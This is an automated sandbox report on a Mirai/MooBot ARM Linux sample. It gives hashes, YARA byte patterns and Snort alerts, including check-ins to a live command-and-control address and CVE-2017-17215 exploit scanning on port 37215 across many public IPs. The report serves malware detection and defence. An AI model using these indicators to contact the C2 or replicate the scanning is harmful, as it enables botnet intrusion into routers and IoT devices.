Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljnee.arm7-20240128-0910.elf

Overview

General Information

Sample name:skyljnee.arm7-20240128-0910.elf
Analysis ID:1382261
MD5:85d46508a733367319b08237c34e0c9d
SHA1:ec0e0c62254804c2d72d6a631fc857cd844da44e
SHA256:2383850472a4ea7dacceb2ad9e8ae6ad732b6724cbb7a806573969e76b1dbf23
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1382261
Start date and time:2024-01-28 10:11:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljnee.arm7-20240128-0910.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljnee.arm7-20240128-0910.elf
PID:5436
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5453, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5453, Parent: 1588, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljnee.arm7-20240128-0910.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljnee.arm7-20240128-0910.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljnee.arm7-20240128-0910.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a69c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5436.1.00007f6484017000.00007f6484034000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5436.1.00007f6484017000.00007f6484034000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5436.1.00007f6484017000.00007f6484034000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1a50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a55c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a610:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a64c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a69c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: skyljnee.arm7-20240128-0910.elf PID: 5436Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x12fad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12fc1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12fd5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12fe9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x12ffd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13011:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13025:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13039:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1304d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13061:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13075:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13089:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1309d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x130b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x130c5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x130d9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x130ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13101:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13115:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13129:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1313d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Timestamp:192.168.2.13163.191.152.23057636372152835222 01/28/24-10:12:55.908150
          SID:2835222
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.13163.191.152.23057636372152829579 01/28/24-10:12:55.908150
          SID:2829579
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.13163.191.48.20052514372152835222 01/28/24-10:13:30.285958
          SID:2835222
          Source Port:52514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:103.245.236.146192.168.2.1319990517382030489 01/28/24-10:12:01.152785
          SID:2030489
          Source Port:19990
          Destination Port:51738
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.13163.191.48.20052514372152829579 01/28/24-10:13:30.285958
          SID:2829579
          Source Port:52514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.13103.245.236.14651738199902030490 01/28/24-10:11:58.793702
          SID:2030490
          Source Port:51738
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: skyljnee.arm7-20240128-0910.elfAvira: detected
          Source: skyljnee.arm7-20240128-0910.elfReversingLabs: Detection: 60%
          Source: skyljnee.arm7-20240128-0910.elfVirustotal: Detection: 43%Perma Link
          Source: skyljnee.arm7-20240128-0910.elfString: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano

          Networking

          barindex
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51738 -> 103.245.236.146:19990
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.146:19990 -> 192.168.2.13:51738
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57636 -> 163.191.152.230:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57636 -> 163.191.152.230:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52514 -> 163.191.48.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52514 -> 163.191.48.200:37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 133.228.36.202:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.101.22.37:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 68.64.8.202:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 74.175.79.57:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.0.198.137:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.118.41.226:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.113.139.69:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.9.204.196:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.78.151.137:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.108.105.116:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.107.144.206:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.30.45.132:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.167.211.115:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.232.14.43:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 76.56.92.111:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 19.152.65.161:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 84.60.174.242:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.27.3.17:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.119.97.29:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.170.30.62:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.226.13.131:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 8.31.93.23:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 59.223.170.227:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 109.4.211.134:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.246.64.142:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 122.20.69.167:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.30.193.21:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.52.71.249:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.118.237.219:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.240.252.145:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.2.171.172:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.62.216.220:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.96.21.64:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.231.50.209:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 159.215.247.177:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.195.214.180:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 106.212.39.13:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.246.180.212:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.112.74.119:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.152.30.126:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.116.198.99:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.104.118.218:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.223.225.65:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.74.216.8:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.80.243.135:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.88.74.160:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.82.24.201:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.144.8.20:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 47.129.3.229:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.243.16.70:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 206.168.103.88:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.28.208.134:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.254.210.80:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.139.147.188:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.1.180.202:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.227.97.48:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.158.216.255:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.145.150.223:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.144.129.224:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 168.237.48.91:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.13.227.53:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.210.84.121:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.95.136.215:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.165.45.104:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.102.119.47:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.158.31.24:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.32.255.42:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.158.45.135:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.117.111.171:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.7.180.231:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.142.170.218:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 83.108.29.82:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 143.21.123.206:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.97.103.223:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.245.212.24:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 34.159.49.174:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.80.215.22:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.150.86.65:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.85.38.34:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.35.168.209:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.236.253.69:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.63.135.17:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.4.119.243:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.132.2.26:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.137.216.79:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.225.245.211:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.129.237.219:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.250.184.93:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 50.178.33.214:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.47.239.125:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.176.42.205:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 24.146.34.190:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.133.195.37:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.177.121.13:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 144.191.80.233:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.180.44.108:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.165.186.222:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.187.93.78:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.42.194.16:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 31.216.32.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.186.206.51:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.170.224.245:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.58.214.214:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.74.210.180:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.98.131.19:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.56.13.171:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.84.98.70:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 190.21.6.118:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.81.151.8:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.122.164.63:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.197.10.184:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 90.133.235.82:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.83.97.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 68.241.48.186:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.179.246.7:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.193.144.138:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.50.126.191:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 1.102.67.92:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.187.21.249:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.240.224.246:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.118.42.154:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.235.172.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.241.233.216:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.254.58.72:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.3.121.35:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.24.195.165:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.199.138.13:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.194.91.243:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.156.88.173:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.128.139.221:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 223.108.207.167:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 158.251.55.197:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.190.241.9:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.215.205.175:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 153.157.77.72:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 19.26.132.93:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.26.93.104:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.211.9.78:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 67.241.52.82:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 61.158.166.188:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 161.195.1.177:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.39.156.87:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 205.13.31.67:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.138.187.102:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.54.46.191:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.183.147.89:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.170.74.29:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.18.149.36:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 204.211.246.69:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.151.42.195:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.216.140.123:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.19.245.52:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.238.50.181:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.201.237.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.67.69.5:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.102.174.239:37215
